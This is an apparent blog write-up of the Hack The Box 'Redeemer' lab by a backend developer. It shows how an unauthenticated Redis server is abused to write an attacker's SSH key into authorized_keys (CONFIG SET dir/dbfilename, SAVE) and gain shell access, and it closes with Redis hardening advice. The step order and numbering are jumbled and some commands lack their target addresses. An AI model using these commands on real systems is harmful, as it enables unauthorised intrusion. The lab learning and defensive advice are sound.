I started Hack The Box to improve my real-world skills, not just follow tutorials. As a Python and Django developer, I wanted to understand how attackers think — especially when it comes to services I use every day, like Redis.
Redeemer was the perfect start. It’s beginner-friendly, focused on Redis, and showed me how a small misconfiguration can open the door to a full system compromise.
What I Learned:
- Redis uses TCP port 6379
- It's common to find it exposed without a password
- Many Redis servers are exposed without a password
- Redis lets you write to the file system if not secured
- Attackers can use this to plant an SSH key and gain shell access
Step-by-Step Walkthrough
- Nmap scan – found port 6379 open
nmap -sV -p- redis-cli -h 2. Connect to Redis
redis-cli -h Check Write Access I checked if I could use CONFIG commands:
config get dir
config get dbfilename3. Verified write permission
4. Injected SSH key
- Created a payload to write my public key into ~/.ssh/authorized_keys
5. Logged in via SSH
This told me where Redis would write the file when I call SAVE.
What Developers Should Know:
- Never expose Redis to the internet
- Always use requirepass and proper firewalls
- Use bind 127.0.0.1 in redis.conf
6. Prepare SSH Key I added my public key to Redis:
set crack "\n\nssh-rsa AAAA... mykey"
config set dir /home/targetuser/.ssh
config set dbfilename "authorized_keys"
save7. SSH into the Box
ssh targetuser@Lessons for Developers
If you're using Redis in production, remember this:
- Never expose Redis to the public internet
- Always set a strong password with requirepass
- Use bind 127.0.0.1 to keep it local
- Restrict access with firewalls or Docker networks
Final Thoughts:
This challenge changed how I see Redis. I used to think of it only as a helpful cache for Django projects. Now I understand how dangerous it can be if not secured.
Hack The Box is a great way to learn security by doing. If you're a backend dev like me, I highly recommend trying it.